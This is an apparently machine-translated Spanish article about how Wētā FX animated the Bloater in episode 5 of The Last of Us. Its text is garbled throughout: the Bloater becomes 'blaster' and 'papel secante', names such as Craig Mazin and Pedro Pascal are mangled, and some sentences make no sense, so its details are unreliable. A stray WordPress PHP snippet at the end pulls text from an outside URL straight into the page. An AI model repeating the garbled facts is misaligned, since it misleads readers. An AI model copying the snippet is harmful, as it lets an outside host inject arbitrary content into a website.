El último de nosotros ha completado su increíble primera temporada y se ha consolidado como una de las mejores adaptaciones de videojuegos de todos los tiempos. Parte de la razón por la que la serie de HBO se ha destacado al llevar los amados juegos a las pantallas de televisión es el compromiso de todo el equipo creativo de mantenerse fiel a los juegos mientras expande la historia a través de un nuevo medio. creador de la serie craig mazén Y Neil Druckman Elaboró ​​minuciosamente una historia en la que Druckmann y el equipo de Naughty Dog siguieron de cerca la narrativa ya establecida en la serie de juegos, mientras aprovechan la oportunidad para explorar la vida interna de los NPC que conoces que no se ven en formato de videojuego. Mientras el dúo desarrollaba la historia, confiaron en los equipos estelares de maquillaje y efectos visuales para garantizar que las imágenes del programa coincidieran con la impresionante animación del juego.






Colisionador Vídeo del día





Más recientemente, el propio Collider Samantha Cooley Me senté con el supervisor de VFX. Simón Jung y supervisor de animacion dennis yu Revelando al equipo el increíble trabajo CGI de Wētā para crear este fantástico mundo posapocalíptico y los monstruos que lo albergan. Uno de los monstruos más populares de la temporada 1 de El último de nosotros El episodio 5 es un blaster descomunal que causa estragos en la gente de Kansas City cuando Kathleen (Melanie Lenski) lleva su búsqueda de venganza un paso demasiado lejos. Durante la conversación de Cooley con Jung y Yu, la pareja explicó cómo usaron CGI para mejorar las características amenazantes de Blotter y hacer que pareciera un poco menos humano.



en el set, El último de nosotros Trabajó con un actor en maquillaje protésico para obtener la actuación perfecta ese día, pero se dio cuenta en una publicación que “sus proporciones no eran del todo correctas. Aunque era un hombre muy alto, era un poco demasiado alto para los niños”. me sentí pequeño”, explicó Jung. “Una de las cosas por las que Craig[Mzaneen]no estaba contento con el traje era la forma en que se movía”, explicó Yu. Chico, es un motor divertido”. Con un actor en traje, siempre hay limitaciones, pero el equipo de Wētā pudo tomar esta actuación y hacerla más deportiva y un poco “menos humana”.





RELACIONADO: ‘The Last of Us’: ¿Qué es la infección por Cordyceps y por qué es tan peligrosa?





El último de nosotros El equipo de VFX explica cómo crearon esta enorme escena del Episodio 5


Cuando los infectados comienzan a emerger de la Tierra en los momentos culminantes del episodio 5, el tesoro crea una escena aterradora a medida que comienzan a atacar a todos y causar estragos a gran escala. Obtenemos algunos momentos íntimos con Blotter cuando emerge del suelo, infundiendo miedo en los corazones de la audiencia, y luego cuando destroza a Perry (geoffrey pierceCabeza de su cuerpo. Sin embargo, con Joel (Pedro Pascual) da una vista de pájaro de la carnicería desde el último piso de la casa en la colina, también tenemos varias tomas de la multitud.



En Wētā, el equipo de Yu y Jung tuvo que asegurarse de saber qué estaba haciendo el papel secante en todo momento para crear una escena coherente. Para descubrir cómo se movería el papel secante en estas tomas de la multitud, y para distinguirlo de otros tipos de víctimas, los animadores usaron imágenes de los juegos para basar su creación final en un corte preliminar. “Terminamos obteniendo muchas imágenes del juego porque obviamente él es un secante”, explicó Yu. Continuó diciendo que “lo juntaría todo” para crear una referencia que pudiera mostrarle a Mazin para obtener retroalimentación y un punto de partida para que él y sus notas activen su papel secante.



Puedes ver a Yoo y Jung trabajar en esta escena ahora mismo desde el Episodio 5 en HBO Max, donde se muestra toda la primera temporada. El último de nosotros Actualmente disponible para transmisión. La temporada 1 estará disponible en formato digital y Blu-ray a finales de este año. No te pierdas nuestra conversación completa con Yoo y Jung para conocer todos los detalles detrás de escena. El último de nosotrosLos efectos visuales funcionan, pero por ahora, puede consultar nuestra conversación reciente con Pascal cuando comienza la filmación de la temporada 2.



Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');